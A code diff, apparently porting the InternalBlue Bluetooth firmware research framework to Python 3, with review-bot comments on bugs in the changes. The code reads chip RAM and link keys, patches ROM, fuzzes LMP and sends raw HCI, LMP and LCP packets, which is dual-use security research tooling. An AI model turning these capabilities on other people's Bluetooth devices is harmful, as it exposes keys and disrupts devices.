if not yesno("Update '%s'?" % os.path.abspath(args.file)):
if not (args.overwrite or yesno("Update '%s'?" % os.path.abspath(args.file))):
return False
dump = self.getMemoryImage(refresh=not args.norefresh)
@@ -566,10 +605,10 @@ class CmdSearchMem(Cmd):
highlight = pattern
if args.hex:
try:
pattern = pattern.decode('hex')
pattern = bytearray.fromhex(pattern)
highlight = pattern
except TypeError as e:
log.warn("Search pattern cannot be converted to hexstring: " + str(e))
log.warn("Search pattern cannot be converted to bytestring: " + str(e))
return False
elif args.address:
pattern = p32(int(pattern, 16))
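Review bot: `bytearray.fromhex(pattern)` raises `ValueError` on a non-hex or odd-length string (on both Python 2 and 3), so the surrounding `except TypeError` no longer catches the error it is meant to report; change it to `except ValueError as e:`.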
@@ -618,7 +657,7 @@ class CmdHexdump(Cmd):
if dump == None:
return False
log.hexdump(dump, begin=args.address)
log.hexdump(bytes(dump), begin=args.address)
return True
class CmdTelescope(Cmd):
@@ -733,9 +772,9 @@ class CmdWriteMem(Cmd):
data = ' '.join(args.data)
if args.hex:
try:
data = data.decode('hex')
data = bytearray.fromhex(data)
except TypeError as e:
log.warn("Data string cannot be converted to hexstring: " + str(e))
log.warn("Hex string cannot be converted to bytestring: " + str(e))
return False
elif args.int:
data = p32(auto_int(data))
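Review bot: same issue as in the search command: `bytearray.fromhex(data)` signals bad input with `ValueError`, not `TypeError`, so the handler should be `except ValueError as e:`.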
@@ -918,14 +957,14 @@ class CmdSendHciCmd(Cmd):
log.info("cmdcode needs to be in the range of 0x0000 - 0xffff")
return False
data = ''
data = b''
for data_part in args.data:
if data_part[0:2] == "0x":
data += p32(auto_int(data_part))
else:
data += data_part.decode('hex')
self.internalblue.sendHciCommand(args.cmdcode, data)
return self.internalblue.sendHciCommand(args.cmdcode, data)
return True
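Review bot: `data = b''` is changed, but the `else` branch still does `data += data_part.decode('hex')`, which is Python 2 only (`str` has no `decode` on Python 3); use `bytearray.fromhex(data_part)` as done elsewhere in this commit. The trailing `return True` after `return self.internalblue.sendHciCommand(args.cmdcode, data)` is now unreachable and can go.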
@@ -956,8 +995,8 @@ class CmdPatch(Cmd):
return True
if args.slot != None:
if args.slot < 0 or args.slot > 128:
log.warn("Slot has to be in the range 0 to 128!")
if args.slot < 0 or args.slot > self.internalblue.fw.PATCHRAM_NUMBER_OF_SLOTS:
log.warn("Slot has to be in the range 0 to %i!" % self.internalblue.fw.PATCHRAM_NUMBER_OF_SLOTS)
return False
# Patch Deletion
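Review bot: `args.slot > self.internalblue.fw.PATCHRAM_NUMBER_OF_SLOTS` still admits `slot == PATCHRAM_NUMBER_OF_SLOTS`; if slots are indexed `0..N-1` the bound should be `>=` and the message should state `N-1` as the upper limit. `args.slot != None` should be `is not None`.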
@@ -1040,9 +1079,9 @@ class CmdSendLmp(Cmd):
connection = self.internalblue.readConnectionInformation(i+1)
if connection == None:
continue
if connection["connection_handle"] != 0 and connection["remote_address"] != b'\x00\x00\x00\x00\x00\x00':
args.conn_handle = connection["connection_handle"]
is_master = connection["master_of_connection"]
if connection.connection_handle != 0 and connection.remote_address != b'\x00\x00\x00\x00\x00\x00':
args.conn_handle = connection.connection_handle
is_master = connection.master_of_connection
break
# if still not set, typical connection handles seem to be 0x0b...0x0d
@@ -1080,6 +1119,37 @@ class CmdFuzzLmp(Cmd):
return self.internalblue.fuzzLmp()
class CmdSendLcp(Cmd):
keywords = ['sendlcp']
description = "Send LCP packet to another device."
parser = argparse.ArgumentParser(prog=keywords[0],
description=description,
epilog="Aliases: " + ", ".join(keywords))
parser.add_argument("--conn_index", "-c", type=auto_int,
help="Connection index, starts at 0 for first connection.")
parser.add_argument("data",
help="Payload as hexstring.")
def work(self):
args = self.getArgs()
if not args:
return True
# if not set, just use 0
if not args.conn_index:
args.conn_index = 0
try:
data = args.data.decode('hex')
except TypeError as e:
log.warn("Data string cannot be converted to hexstring: " + str(e))
return False
log.info("Sending data=%s to connection index=0x%04x" %
(data.encode('hex'), args.conn_index))
return self.internalblue.sendLcpPacket(args.conn_index, data)
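Review bot: the newly added `CmdSendLcp` uses `args.data.decode('hex')` and `data.encode('hex')`, the Python 2 only hex codec this commit is removing everywhere else; use `bytearray.fromhex(args.data)` with `except ValueError`, and `bytes_to_hex(data)` (already imported in this file) for the log line.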
class CmdInfo(Cmd):
keywords = ['info', 'show', 'i']
description = "Display various types of information parsed from live RAM"
@@ -1112,21 +1182,21 @@ class CmdInfo(Cmd):
continue
log.info("### | Connection ---%02d--- ###" % i)
log.info(" - Number: %d" % connection["connection_number"])
log.info(" - Remote BT address: %s" % bt_addr_to_str(connection["remote_address"]))
log.info(" - Remote BT name: %08X" % connection["remote_name_address"])
log.info(" - Master of Conn.: %s" % str(connection["master_of_connection"]))
log.info(" - Conn. Handle: 0x%X" % connection["connection_handle"])
log.info(" - Public RAND: %s" % connection["public_rand"].encode('hex'))
#log.info(" - PIN: %s" % connection["pin"].encode('hex'))
#log.info(" - BT addr for key: %s" % bt_addr_to_str(connection["bt_addr_for_key"]))
log.info(" - Effective Key Len: %d byte (%d bit)" % (connection["effective_key_len"], 8*connection["effective_key_len"]))
log.info(" - Link Key: %s" % connection["link_key"].encode('hex'))
log.info(" - LMP Features: %s" % connection["extended_lmp_feat"].encode('hex'))
log.info(" - Host Supported F: %s" % connection["host_supported_feat"].encode('hex'))
log.info(" - TX Power (dBm): %d" % connection["tx_pwr_lvl_dBm"])
log.info(" - Array Index: %s" % connection["id"].encode('hex'))
print
log.info(" - Number: %d" % connection.connection_number)
log.info(" - Remote BT address: %s" % bt_addr_to_str(connection.remote_address))
log.info(" - Remote BT name: %08X" % connection.remote_name_address)
log.info(" - Master of Conn.: %s" % str(connection.master_of_connection))
log.info(" - Conn. Handle: 0x%X" % connection.connection_handle)
log.info(" - Public RAND: %s" % bytes_to_hex(connection.public_rand))
#log.info(" - PIN: %s" % bytes_to_hex(connection.pin)
#log.info(" - BT addr for key: %s" % bt_addr_to_str(connection.bt_addr_for_key))
log.info(" - Effective Key Len: %d byte (%d bit)" % (connection.effective_key_len, 8*connection["effective_key_len"]))
log.info(" - Link Key: %s" % bytes_to_hex(connection.link_key))
log.info(" - LMP Features: %s" % bytes_to_hex(connection.extended_lmp_feat))
log.info(" - Host Supported F: %s" % bytes_to_hex(connection.host_supported_feat))
log.info(" - TX Power (dBm): %d" % connection.tx_pwr_lvl_dBm)
log.info(" - Array Index: %s" % bytes_to_hex(connection.id))
print()
return True
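Review bot: the "Effective Key Len" line mixes the two access styles: `connection.effective_key_len` and, in the same tuple, `8*connection["effective_key_len"]`; the leftover subscript will fail on the connection object every other field now uses attribute access for. The commented-out PIN line is also missing its closing parenthesis, which will bite whoever re-enables it.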
def infoDevice(self, args):
@@ -1135,14 +1205,14 @@ class CmdInfo(Cmd):
log.warn(" '%s' not in fw.py. FEATURE NOT SUPPORTED!" % const)
return False
bt_addr = self.readMem(self.internalblue.fw.BD_ADDR, 6)[::-1]
bt_addr_str = ":".join([b.encode("hex") for b in bt_addr])
bt_addr_str = bt_addr_to_str(bt_addr)
device_name = self.readMem(self.internalblue.fw.DEVICE_NAME, 258)
device_name_len = u8(device_name[0])-1
device_name_len = device_name[0]-1
device_name = device_name[2:2+device_name_len]
adb_serial = context.device
log.info("### | Device ###")
log.info(" - Name: %s" % device_name)
log.info(" - Name: %s" % device_name.decode('utf-8'))
log.info(" - ADB Serial: %s" % adb_serial)
log.info(" - Address: %s" % bt_addr_str)
return True
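Review bot: `device_name[0]-1` assumes indexing yields an `int`, which holds for bytes on Python 3 but not for a `str` result on Python 2; `bytearray(device_name)[0]` behaves the same on both. The new `device_name.decode('utf-8')` is strict, and a name read straight out of RAM can contain arbitrary bytes, so `decode('utf-8', errors='replace')` avoids aborting the `info device` output.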
@@ -1164,7 +1234,7 @@ class CmdInfo(Cmd):
code = disasm(table_values[i],vma=table_addresses[i],byte=False,offset=False)
code = code.replace(" ", " ").replace("\n", "; ")
log.info("[%03d] 0x%08X: %s (%s)" % (i, table_addresses[i],
table_values[i].encode('hex'),
bytes_to_hex(table_values[i]),
code))
return True
@@ -1242,7 +1312,7 @@ class CmdInfo(Cmd):
# Print Buffer Details
buffer_size = bloc_for_details["buffer_size"] + 4
for buffer_address, buffer_hdr in bloc_for_details["buffer_headers"].iteritems():
for buffer_address, buffer_hdr in bloc_for_details["buffer_headers"].items():
progress_log.status("Dumping buffers from BLOC[%d]: 0x%06X" % (bloc_for_details["index"], buffer_address))
# Buffer in use!
if buffer_hdr == bloc_for_details["address"]:
@@ -1264,7 +1334,7 @@ class CmdInfo(Cmd):
log.info("[ Idx ] @Queue-Addr Queue-Name Items/Free/Capacity Item-Size Buffer")
log.info("------------------------------------------------------------______--------------")
for queue in queuelist:
for queue in [vars(element) for element in queuelist]:
# TODO: waitlist
log.info(("QUEU[{index:2d}] @ 0x{address:06X}: {name:21s} {available_items:2d} /"
" {free_slots:2d} / {capacity:2d} {item_size:2d} Bytes 0x{queue_buf_start:06X}").format(**queue))
@@ -1298,7 +1368,7 @@ class CmdInfo(Cmd):
if args.type in subcommands:
return subcommands[args.type](args.args)
else:
log.warn("Unkown type: %s\nKnown types: %s" % (args.type, subcommands.keys()))
log.warn("Unkown type: %s\nKnown types: %s" % (args.type, list(subcommands.keys())))
return False
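Review bot: the touched line keeps the typo "Unkown"; fix it to "Unknown" while the string is being changed anyway.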
@@ -1347,6 +1417,26 @@ class CmdTracepoint(Cmd):
return True
class CmdBreakpoint(Cmd):
keywords = ['break', 'breakpoint', 'bp']
description = "Add breakpoint. This will crash, but produces a stackdump at the given address."
parser = argparse.ArgumentParser(prog=keywords[0],
description=description,
epilog="Aliases: " + ", ".join(keywords))
parser.add_argument("address", type=auto_int, nargs="?",
help="Address of the breakpoint")
def work(self):
args = self.getArgs()
if args == None:
return True
log.info("Inserting breakpoint at 0x%x..." % args.address)
self.internalblue.patchRom(args.address, "\x00\xbe\x00\x00")
return True
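Review bot: the new `CmdBreakpoint` passes `"\x00\xbe\x00\x00"` as a `str` to `patchRom`, contrary to the explicit-bytes aim of this commit; use `b"\x00\xbe\x00\x00"` and add a comment saying what the four bytes are. Since `address` is declared `nargs="?"`, `args.address` can be `None`, in which case `"0x%x" % args.address` raises `TypeError`; make the argument required or check for `None` and return with a warning.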
class CmdConnectCmd(Cmd):
keywords = ['connect', 'c']
description = "Initiate a connection to a remote Bluetooth device"
@@ -1402,7 +1492,8 @@ class CmdCustom(Cmd):
actions = ['list', 'add', 'run', 'remove']
for keyword in list(keywords):
keywords.extend(['%s %s' % (keyword, action) for action in actions])
for action in actions:
keywords.append('%s %s' % (keyword, action))
parser = argparse.ArgumentParser(prog=keywords[0],
description=description,
@@ -1437,7 +1528,7 @@ class CmdCustom(Cmd):
return True
if args.do == 'list':
custom_cmds= ["\t%s\t\t%s\n" % (k, v) for k, v in sorted(CmdCustom.custom_commands.iteritems())]
custom_cmds= ["\t%s\t\t%s\n" % (k, v) for k, v in sorted(CmdCustom.custom_commands.items())]
log.info("Custom commands:\n%s" % ''.join(custom_cmds))
return True
@@ -1522,7 +1613,7 @@ class CmdReadAfhChannelMap(Cmd):
if connection == None:
continue
else:
self.readafh(connection["connection_handle"])
self.readafh(connection.connection_handle)
return True
# if not set but connection struct unknown, typical connection handles seem to be 0x0b...0x0d
else:
@@ -1535,15 +1626,15 @@ class CmdReadAfhChannelMap(Cmd):
"""
response = self.internalblue.sendHciCommand(0x1406, p16(handle))
if len(response) < 17 or response[8:] == '\x00'*9:
if len(response) < 17 or response[8:] == b'\x00'*9:
log.info("Connection 0x%04x is not established." % handle)
return False
log.info("Connection Handle: 0x%04x" % handle)
log.info("AFH Enabled: %s" % bool(response[7] != '\x00'))
log.info("AFH Enabled: %s" % bool(response[7] != 0))
channels = ""
for c in response[8:]:
bits = format(ord(c), '08b')
bits = format(c, '08b')
for b in bits:
if b == "1":
channels = channels + " *"
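Review bot: the three corrected comparisons (`response[8:] == b'\x00'*9`, `response[7] != 0` and `format(c, '08b')`) are only right if `response` is a `bytearray` on both interpreters; with a plain Python 2 `str`, `response[7] != 0` would always be true and `format(c, '08b')` would raise TypeError. `sendHciCommand` is annotated `-> Optional[bytearray]` in this series, so it holds, but a `response = bytearray(response)` at the top of `readafh` would make the method robust if a core ever returns `bytes`. `bool(response[7] != 0)` is redundant, the comparison already yields a bool.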
@@ -1570,10 +1661,18 @@ class CmdSendDiagCmd(Cmd):
parser = argparse.ArgumentParser(prog=keywords[0],
description=description,
epilog="Aliases: " + ", ".join(keywords))
parser.add_argument("--type", type=auto_int, default=0x07,
help="Type. Default is 0x07, but you can use 0x02 for ACL and 0x03 for SCO."
"Other values might crash.")
parser.add_argument("data", nargs="*",
help="Payload as combinations of hexstrings and hex-uint32 (starting with 0x..). Known commands so far: Reset ACL BR Stats (b9), Get ACL BR Stats (c1), Get ACL EDR Stats (c2), Get AUX Stats (c3), Get Connections (cf), Enable Link Manager Diagnostics (f001), Get Memory Peek (f1), Get Memory Poke (f2), Get Memory Dump (f3), Packet Test (f6).")
help="Payload as combinations of hexstrings and hex-uint32 (starting with 0x..). "
"Known commands so far: Reset ACL BR Stats (b9), Get ACL BR Stats (c1), "
"Get ACL EDR Stats (c2), Get AUX Stats (c3), Get Connections (cf), "
"Enable Link Manager Diagnostics (f001), Get Memory Peek (f1), Get Memory Poke (f2), "
"Get Memory Dump (f3), Packet Test (f6).")
def work(self):
args = self.getArgs()
if not args or not args.data:
return True
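Review bot: the two adjacent literals in the `--type` help concatenate without a separator, so the rendered text reads `... 0x03 for SCO.Other values might crash.`; add a trailing space after `SCO.` as was done for each fragment of the reflowed `data` help string in the same hunk.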
@@ -1585,7 +1684,7 @@ class CmdSendDiagCmd(Cmd):
else:
data += data_part.decode('hex')
self.internalblue.sendH4(0x07, data)
self.internalblue.sendH4(args.type, data)
return True
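Review bot: the unchanged context line `data += data_part.decode('hex')` directly above the fixed `sendH4(args.type, data)` call still uses the Python 2 `hex` codec; on Python 3 `str` has no `decode`, so this raises AttributeError before anything is sent. Replace it with `bytearray.fromhex(data_part)`, which works on both interpreters and yields the byte type the rest of the payload building expects. Also, `--type` is now forwarded into `sendH4` without any check, so the "other values might crash" help text is the only guard; a `log.warn` when the type is not 0x02, 0x03 or 0x07 would be cheap and helpful for a diagnostic command.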
+278 -141
@@ -25,20 +25,44 @@
# out of or in connection with the Software or the use or other dealings in the
# Software.
from __future__ import division
from future import standard_library
standard_library.install_aliases()
from builtins import hex
from builtins import str
from builtins import range
from builtins import object
from past.utils import old_div
from abc import ABCMeta, abstractmethod
from pwn import *
from fw.fw import Firmware
from .fw.fw import Firmware
import datetime
import time
import Queue
import hci
import queue as queue2k
from . import hci
from .objects.queue_element import QueueElement
from .objects.connection_information import ConnectionInformation
from future.utils import with_metaclass
from internalblue.utils import bytes_to_hex
try:
from typing import List, Optional, Any, TYPE_CHECKING, Tuple, Union, NewType, Callable
from internalblue import Address, Record, Task, HCI_CMD, FilterFunction, ConnectionNumber, ConnectionDict, \
ConnectionIndex, BluetoothAddress, HeapInformation, QueueInformation, Opcode
from internalblue.hci import HCI
from . import DeviceTuple
if TYPE_CHECKING:
pass
except:
pass
class InternalBlue:
__metaclass__ = ABCMeta
#import logging
#log = logging.getLogger(__name__)
def __init__(self, queue_size=1000, btsnooplog_filename='btsnoop.log', log_level='info', fix_binutils='True', data_directory="."):
class InternalBlue(with_metaclass(ABCMeta, object)):
def __init__(self, queue_size=1000, btsnooplog_filename='btsnoop.log', log_level='info', fix_binutils='True', data_directory=".", replay=False):
# type: (int, str, str, bool, str, bool) -> None
context.log_level = log_level
context.log_file = data_directory + '/_internalblue.log'
context.arch = "thumb"
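Review bot: the new `# type: (int, str, str, bool, str, bool) -> None` comment does not match the signature it annotates: `fix_binutils='True'` defaults to the string `'True'`, not a bool, and a non-empty string is always truthy, so passing `fix_binutils='False'` would still fix; change the default to `True` (or make the annotation say `str`). Two smaller points in the same hunk: the `try: ... except: pass` around the typing imports is a bare `except` that also hides a genuine circular-import error from `from internalblue import Address, ...`; narrow it to `except ImportError:`. And the module now mixes relative imports (`from .fw.fw import Firmware`, `from . import hci`) with absolute ones (`from internalblue.utils import bytes_to_hex`); pick one style.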
@@ -48,11 +72,11 @@ class InternalBlue:
self.data_directory = data_directory
self.s_inject = None # This is the TCP socket to the HCI inject port
self.s_snoop = None # This is the TCP socket to the HCI snoop port
self.s_inject = None #type: socket.socket # This is the TCP socket to the HCI inject port
self.s_snoop = None #type: socket.socket # This is the TCP socket to the HCI snoop port
# If btsnooplog_filename is set, write all incomming HCI packets to a file (can be viewed in wireshark for debugging)
if btsnooplog_filename != None:
if btsnooplog_filename is not None:
self.write_btsnooplog = True
self.btsnooplog_file = open(self.data_directory + "/" + btsnooplog_filename, "wb")
else:
@@ -78,12 +102,12 @@ class InternalBlue:
# firmware (the response is recognized with the help of the filter function).
# Once the response arrived, it puts the response into the response_queue from
# the tuple. See sendH4() and sendHciCommand().
self.sendQueue = Queue.Queue(queue_size)
self.sendQueue = queue2k.Queue(queue_size) # type: Queue.Queue[Task]
self.recvThread = None # The thread which is responsible for the HCI snoop socket
self.sendThread = None # The thread which is responsible for the HCI inject socket
self.tracepoints = [] # A list of currently active tracepoints
self.tracepoints = [] # A list of currently active tracepoints
# The list contains tuples:
# [0] target address
# [1] address of the hook code
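Review bot: the type comment `# type: Queue.Queue[Task]` on `self.sendQueue` refers to `Queue`, which this module no longer binds now that the import is `import queue as queue2k`, so a type checker reports an undefined name. Use `queue2k.Queue[Task]` here and in the other `Queue.Queue[...]` comments added below (`registeredHciRecvQueues`, `registerHciRecvQueue`, `unregisterHciRecvQueue`). The `self.tracepoints = []` line appears to change only whitespace, which adds noise to the diff.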
@@ -103,7 +127,7 @@ class InternalBlue:
# filter_function will be called for each packet that is received and only if it returns
# True, the packet will be put into the queue. The filter_function can be None in order
# to put all packets into the queue.
self.registeredHciRecvQueues = []
self.registeredHciRecvQueues = [] # type: List[Tuple[Queue.Queue[Record], FilterFunction]]
self.exit_requested = False # Will be set to true when the framework wants to shut down (e.g. on error or user exit)
self.running = False # 'running' is True once the connection to the HCI sockets is established
@@ -120,6 +144,9 @@ class InternalBlue:
self.registerHciCallback(self.connectionStatusCallback)
self.registerHciCallback(self.coexStatusCallback)
# If the --replay flag was used and a chip is spoofed.
self.replay = replay
def check_binutils(self, fix=True):
"""
Test if ARM binutils is in path so that asm and disasm (provided by
@@ -162,6 +189,7 @@ class InternalBlue:
return False
def _parse_time(self, time):
# type: (Any) -> datetime.datetime
"""
Taken from: https://github.com/joekickass/python-btsnoop
@@ -175,12 +203,14 @@ class InternalBlue:
time_betw_0_and_2000_ad = int("0x00E03AB44A676000", 16)
time_since_2000_epoch = datetime.timedelta(microseconds=time) - datetime.timedelta(microseconds=time_betw_0_and_2000_ad)
return datetime.datetime(2000, 1, 1) + time_since_2000_epoch
@abstractmethod
def _recvThreadFunc(self):
# type: () -> None
pass
def _sendThreadFunc(self):
# type: () -> None
"""
This is the run-function of the sendThread. It polls the sendQueue for new 'send tasks'
and executes them (sends H4 commands to the chip and returns the response).
@@ -203,7 +233,7 @@ class InternalBlue:
# Wait for 'send task' in send queue
try:
task = self.sendQueue.get(timeout=0.5)
except Queue.Empty:
except queue2k.Empty:
continue
# Extract the components of the task
@@ -219,8 +249,21 @@ class InternalBlue:
# HCICore: need to manually save the data to btsnoop log as it is not
# reflected to us as with adb
if self.__class__.__name__ == "ADBCore":
# prepend with total length for H4 over adb
data = p16(len(data)) + data
# prepend with total length for H4 over adb with modified Bluetooth module
if not self.serial:
data = p16(len(data)) + data
# If we do not have a patched module, we write to the serial using the same socket.
# Echoing HCI commands to the serial interface has the following syntax:
#
# echo -ne "\x01\x4c\xfc\x05\x33\x22\x11\x00\xaa"
# 0x01: HCI command
# 0xfc4c: Write RAM
# 0x05: Parameter length
# 0x3322...: Parameters
#
# ...and that's how the data is formatted already anyway
elif self.__class__.__name__ == "HCICore":
if self.write_btsnooplog:
# btsnoop record header data:
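Review bot: the new `if not self.serial:` branch reads an attribute that is not assigned anywhere in the `__init__` changes of this file, so an ADBCore instance that reaches `_sendThreadFunc` without having set `self.serial` kills the send thread with AttributeError; initialise `self.serial = False` in the base `__init__` next to `self.replay`, or use `getattr(self, 'serial', False)`. The explanatory comment is welcome; it would be clearer if it said outright that in the serial case the data is written unchanged, without the length prefix, which is what the code does.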
@@ -242,15 +285,17 @@ class InternalBlue:
# if the caller expects a response: register a queue to receive the response
if queue != None and filter_function != None:
recvQueue = Queue.Queue(1)
recvQueue = queue2k.Queue(1)
self.registerHciRecvQueue(recvQueue, filter_function)
# Send command to the chip using s_inject socket
try:
log.debug("_sendThreadFunc: Send: " + str(out.encode('hex')))
log.debug("_sendThreadFunc: Send: " + bytes_to_hex(out))
self.s_inject.send(out)
except:
log.warn("_sendThreadFunc: Sending to socket failed, reestablishing connection.\nWith HCI sockets, some HCI commands require root!")
except socket.error:
pass
except socket.error as e:
log.warn("_sendThreadFunc: Sending to socket failed with {}, reestablishing connection.\nWith HCI sockets, some HCI commands require root!".format(e))
# socket are terminated by hcicore..
self._teardownSockets()
self._setupSockets()
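Review bot: narrowing the bare `except:` to `except socket.error as e` is an improvement (the old second `except socket.error: pass` was unreachable), but any non-socket exception from `self.s_inject.send(out)` now propagates and terminates the send thread. `self.s_inject` is initialised to `None` earlier in this file, so after a failed `_setupSockets()` the next send raises AttributeError and the thread dies silently; check `self.s_inject is None` before sending, or catch it and set `self.exit_requested` so the failure is visible. `if queue != None and filter_function != None` should use `is not None`.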
@@ -262,7 +307,7 @@ class InternalBlue:
record = recvQueue.get(timeout=2)
hcipkt = record[0]
data = hcipkt.data
except Queue.Empty:
except queue2k.Empty:
log.warn("_sendThreadFunc: No response from the firmware.")
data = None
self.unregisterHciRecvQueue(recvQueue)
@@ -274,6 +319,7 @@ class InternalBlue:
log.debug("Send Thread terminated.")
def _tracepointHciCallbackFunction(self, record):
# type: (Record) -> None
hcipkt = record[0] # get HCI Event packet
timestamp = record[5] # get timestamp
@@ -296,7 +342,7 @@ class InternalBlue:
registers += "r10: 0x%08x r11: 0x%08x r12: 0x%08x\n" % \
tuple(self.tracepoint_registers[13:16])
log.info("Tracepoint 0x%x was hit and deactivated:\n" % pc + registers)
filename = self.data_directory + "/" + "internalblue_tracepoint_registers_%s.bin" % datetime.datetime.now().strftime("%Y-%m-%d_%H-%M-%S")
log.info("Captured Registers for Tracepoint to %s" % filename)
f = open(filename, "w")
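Review bot: the context line `f = open(filename, "w")` writes the captured register dump to a `.bin` file in text mode; on Python 3 writing bytes to a text handle raises TypeError, so this needs `open(filename, "wb")`, preferably in a `with` block so the file is closed on the error path too.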
@@ -320,7 +366,7 @@ class InternalBlue:
if self.tracepoint_memdump_address == None:
self.tracepoint_memdump_address = dump_address
normalized_address = dump_address - self.tracepoint_memdump_address
normalized_address = dump_address - self.tracepoint_memdump_address
self.tracepoint_memdump_parts[normalized_address] = data
# Check if this was the last packet
@@ -335,6 +381,7 @@ class InternalBlue:
def addTracepoint(self, address):
# type: (Address) -> bool
# Check if constants are defined in fw.py
for const in ['TRACEPOINT_BODY_ASM_LOCATION', 'TRACEPOINT_BODY_ASM_SNIPPET',
'TRACEPOINT_HOOK_ASM', 'TRACEPOINT_HOOKS_LOCATION',
@@ -428,6 +475,7 @@ class InternalBlue:
return True
def deleteTracepoint(self, address):
# type: (Address) -> bool
if not self.check_running():
return False
@@ -447,6 +495,7 @@ class InternalBlue:
return True
def check_running(self):
# type: () -> bool
"""
Check if the framework is running (i.e. the sockets are connected,
the recv and send threads are running and exit_requested is not True)
@@ -462,10 +511,11 @@ class InternalBlue:
@abstractmethod
def device_list(self):
# type: () -> List[DeviceTuple]
pass
def connect(self):
# type: () -> bool
if self.exit_requested:
self.shutdown()
@@ -497,7 +547,7 @@ class InternalBlue:
# register hci callback:
self.registerHciCallback(self.stackDumpReceiver.recvPacket)
if not self.initialize_fimware():
log.warn("connect: Failed to initialize firmware!")
return False
@@ -509,16 +559,17 @@ class InternalBlue:
@abstractmethod
def local_connect(self):
return True
def initialize_fimware(self):
# type: () -> bool
"""
Checks if we are running on a Broadcom chip and loads available firmware information based
on LMP subversion.
"""
# send Read_Local_Version_Information
version = self.sendHciCommand(0x1001, '')
version = self.sendHciCommand(0x1001, ''.encode('utf-8'))
if not version or len(version) < 11:
log.warn("""initialize_fimware: Failed to send a HCI command to the Bluetooth driver.
adb: Check if you installed a custom bluetooth.default.so properly on your
@@ -527,22 +578,28 @@ class InternalBlue:
return False
# Broadcom uses 0x000f as vendor ID, Cypress 0x0131
vendor = (u8(version[9]) << 8) + u8(version[8])
vendor = (version[9] << 8) + version[8]
if vendor != 0xf and vendor != 0x131:
log.critical("Not running on a Broadcom or Cypress chip!")
return False
else:
subversion = (u8(version[11]) << 8) + u8(version[10])
self.fw = Firmware(subversion).firmware
subversion = (version[11] << 8) + version[10]
iOS = False
if self.__class__.__name__ == "iOSCore":
iOS = True
self.fw = Firmware(subversion, iOS).firmware
# Safe to turn diagnostic logging on, it just gets a timeout if the Android
# driver was recompiled with other flags but without applying a proper patch.
log.info("Try to enable debugging on H4 (warning if not supported)...")
self.enableBroadcomDiagnosticLogging(True)
return True
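Review bot: `''.encode('utf-8')` is an obscure way to write `b''`; use the literal. `(version[9] << 8) + version[8]` relies on `version` being a `bytearray` (consistent with the `Optional[bytearray]` annotation on `sendHciCommand`); on a Python 2 `str` the shift would fail, so the cores must keep returning `bytearray`. The method name `initialize_fimware` (also called from `connect()` above) is a typo for `initialize_firmware`; since this series already touches every call site, this is a good moment to rename it. The new `iOSCore` special case that selects the iOS firmware table deserves a line in the docstring.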
def shutdown(self):
# type: () -> None
"""
Shutdown the framework by stopping the send and recv threads. Socket shutdown
also terminates port forwarding if adb is used.
@@ -575,6 +632,7 @@ class InternalBlue:
log.info("Shutdown complete.")
def registerHciCallback(self, callback):
# type: (Callable[[Record], None ]) -> None
"""
Add a new callback function to self.registeredHciCallbacks.
The function will be called every time the recvThread receives
@@ -594,6 +652,7 @@ class InternalBlue:
self.registeredHciCallbacks.append(callback)
def unregisterHciCallback(self, callback):
# type: (Callable[[Tuple[HCI, int, int, int, Any, datetime.datetime]], None ]) -> None
"""
Remove a callback function from self.registeredHciCallbacks.
"""
@@ -604,6 +663,7 @@ class InternalBlue:
log.warn("registerHciCallback: no such callback is registered!")
def registerHciRecvQueue(self, queue, filter_function=None):
# type: (Queue.Queue[Record], FilterFunction) -> None
"""
Add a new queue to self.registeredHciRecvQueues.
The queue will be filled by the recvThread every time the thread receives
@@ -626,6 +686,7 @@ class InternalBlue:
self.registeredHciRecvQueues.append((queue, filter_function))
def unregisterHciRecvQueue(self, queue):
# type: (Queue.Queue[Tuple[HCI, int, int, int, Any, datetime]]) -> None
"""
Remove a queue from self.registeredHciRecvQueues.
"""
@@ -636,7 +697,8 @@ class InternalBlue:
return
log.warn("registerHciRecvQueue: no such queue is registered!")
def sendHciCommand(self, opcode, data, timeout=2):
def sendHciCommand(self, opcode, data, timeout=3):
# type: (Opcode, bytes, int) -> Optional[bytearray]
"""
Send an arbitrary HCI command packet by pushing a send-task into the
sendQueue. This function blocks until the response is received
@@ -648,7 +710,7 @@ class InternalBlue:
# return this instead of the Command Complete Event (which will
# follow later and will be ignored). This should be fixed..
queue = Queue.Queue(1)
queue = queue2k.Queue(1)
# standard HCI command structure
payload = p16(opcode) + p8(len(data)) + data
@@ -656,6 +718,7 @@ class InternalBlue:
# define a filter function which recognizes the response (command complete
# or command status event).
def recvFilterFunction(record):
# type: (Record) -> bool
hcipkt = record[0]
log.debug("sendHciCommand.recvFilterFunction: got response")
@@ -677,14 +740,19 @@ class InternalBlue:
timeout=timeout)
ret = queue.get(timeout=timeout)
return ret
except Queue.Empty:
except queue2k.Empty:
log.warn("sendHciCommand: waiting for response timed out!")
# If there was no response because the Trace Replay Hook throw an assert it will be in this attribute.
# Raise this so the main thread doesn't ignore this and it will be caught by any testing framework
if hasattr(self, 'test_failed'):
raise self.test_failed
return None
except Queue.Full:
except queue.Full:
log.warn("sendHciCommand: send queue is full!")
return None
def sendH4(self, h4type, data, timeout=2):
# type: (HCI_CMD, bytes, int) -> bool
"""
Send an arbitrary H4 packet by pushing a send-task into the
sendQueue. This function does not wait for a response! If you
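Review bot: `except queue.Full:` is broken in this function: `queue` is the local `queue2k.Queue(1)` instance created a few lines up (`queue = queue2k.Queue(1)`), so when `self.sendQueue.put(...)` raises `Full`, evaluating the except clause raises `AttributeError: 'Queue' object has no attribute 'Full'` and the original exception is lost. It must be `except queue2k.Full:`, the earlier sed only rewrote `.Empty` and `.Queue`. The `raise self.test_failed` escape hatch is reasonable for the test harness, but probing with `hasattr(self, 'test_failed')` on a production object is surprising; initialise `self.test_failed = None` in `__init__` and test `if self.test_failed is not None`.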
@@ -696,11 +764,12 @@ class InternalBlue:
try:
self.sendQueue.put((h4type, data, None, None), timeout=timeout)
return True
except Queue.Full:
except queue.Full:
log.warn("sendH4: send queue is full!")
return False
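Review bot: same problem as in `sendHciCommand`: `except queue.Full:` names `queue`, which this module's own imports no longer bind (the import is `import queue as queue2k`), so a full send queue becomes a NameError instead of the intended warning; change it to `except queue2k.Full:`.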
def recvPacket(self, timeout=None):
# type: (Optional[int]) -> Optional[Record]
"""
This function polls the recvQueue for the next available HCI
packet and returns it. The function checks whether it is called
@@ -713,7 +782,7 @@ class InternalBlue:
a blocking manner. Consider using the registerHciCallback()
functionality as an alternative which works asynchronously.
"""
log.debug("recvPacket: called")
if not self.check_running():
@@ -721,10 +790,11 @@ class InternalBlue:
try:
return self.recvQueue.get(timeout=timeout)
except Queue.Empty:
except queue2k.Empty:
return None
def readMem(self, address, length, progress_log=None, bytes_done=0, bytes_total=0):
